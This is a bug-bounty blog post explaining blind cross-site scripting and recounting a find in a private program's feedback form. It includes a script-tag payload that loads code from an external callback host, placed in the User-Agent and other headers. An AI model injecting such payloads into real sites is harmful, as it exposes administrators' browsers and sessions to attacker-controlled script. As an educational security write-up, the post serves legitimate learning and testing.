INTRODUCTION TO BLIND XSS
Last year I was scrolling my LinkedIn Profile feeds suddenly a post came in front of me. In that post, a Bug Hunter posted his PoC about how he found Blind-XSS in Spotify. I was surprised after hearing about BXSS. I was surprised at that moment after watching that there is another category of XSS which is known as BLIND XSS. Then my greed for collecting information about new hacking or exploitation techniques was increased, then I started researching BXSS. So in this post, I’m going to give all the information about the BXSS that I got.
#! What is Cross-Site Scripting
For me, Cross-Site Scripting is a type of Web Application Vulnerability that enables an attacker to inject scripts from client-side to web pages. This vulnerability is extremely dangerous for web applications attackers can Deface the whole page, they can redirect a from existing web page to another and also this is responsible for bypassing access controls. In 2017, XSS was still considered a major threat vector.
Mainly XSS are of 5 types that are:
<#!> Persistent or Stored XSS [Most Dangerous]
<#!> Reflected or Non-Persistent XSS [Critical]
<#!> DOM Based XSS [Depends on Client Side to Execute]
<#!> Self XSS [Triggred Using Social Engineering]
<#!> Mutated XSS [Extremely Hard To Patch This]
Now there is one more XSS that comes in the world known as Blind Cross-Site Scripting.
#! Blind Cross-Site Scripting [BXSS]
For me, Blind XSS is a type of Stored XSS in which the attacker’s input is saved by the server and is reflected in the developer’s application. Basically, the attacker’s payload is executed on the application used by team members or admins.
Attackers in BXSS inject their payload “blindly” on web pages that are likely to save their payload into the database (like contact forms, logs, etc.). Then, the attacker waits for a server-side user or team member [who deals with website databases] to open or trigger that script or payload to execute.
#! Tools for Blind Cross-Site Scripting
Normally I use XSSHunter for finding Blind XSS. There are more tools available on the Internet that are: Burp Collaborator, KnoXSS, bXSS Hunter and many more.
#! How to send Blind XSS Payloads
I generally replace my User-Agent [Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0] with my script [“><script src=https://r0x4r.xss.ht></script>]. Use the User-Agent Switcher extension in Firefox to change or manipulate your user-agent.
We also inject our payload in Referred/Origin Header or in cookies value.
#! How I Was Able To Exploit bXSS In A Private Bug Bounty Program
As this was a private program all illustrations of vulnerabilities will be represented with the host as example.com.
The application has a login page where users can use the credentials provided to sign-in the application using provided credentials.
After signing in into the account now we are able to send some feedback to the backend or the team who are reviewing it.
So, what I did was I checked the format of the form which is going to the backend. The form contains my IP Address, Preferred Language, User-agent, Name, Message, and Email ID. So I started injecting my bXSS script in all the fields except the field which contains email ID.
After 5–10 mins an email arrived on my Mail Account that is from XSS Hunter and it says your payload is just triggered and that is the payload which I injected in Preferred Language field.
#! Preventing Blind XSS Attacks
The most effective way to accomplish this is by web developers who review the code and ensure that any user input is properly sanitized. If this is not done, there is a risk that any scripting tag is not scraped before the user’s input is stored or saved on the user’s browser, and as a result, your website or web application is vulnerable to XSS, Which includes blind XSS attacks.
Other PoCs or Article about Blind XSS:
https://hackerone.com/reports/275518
https://medium.com/bugbountywriteup/blind-xss-for-beginners-c88e48083071
https://hackerone.com/reports/314126
https://thehackerblog.com/poisoning-the-well-compromising-godaddy-customer-support-with-blind-xss/
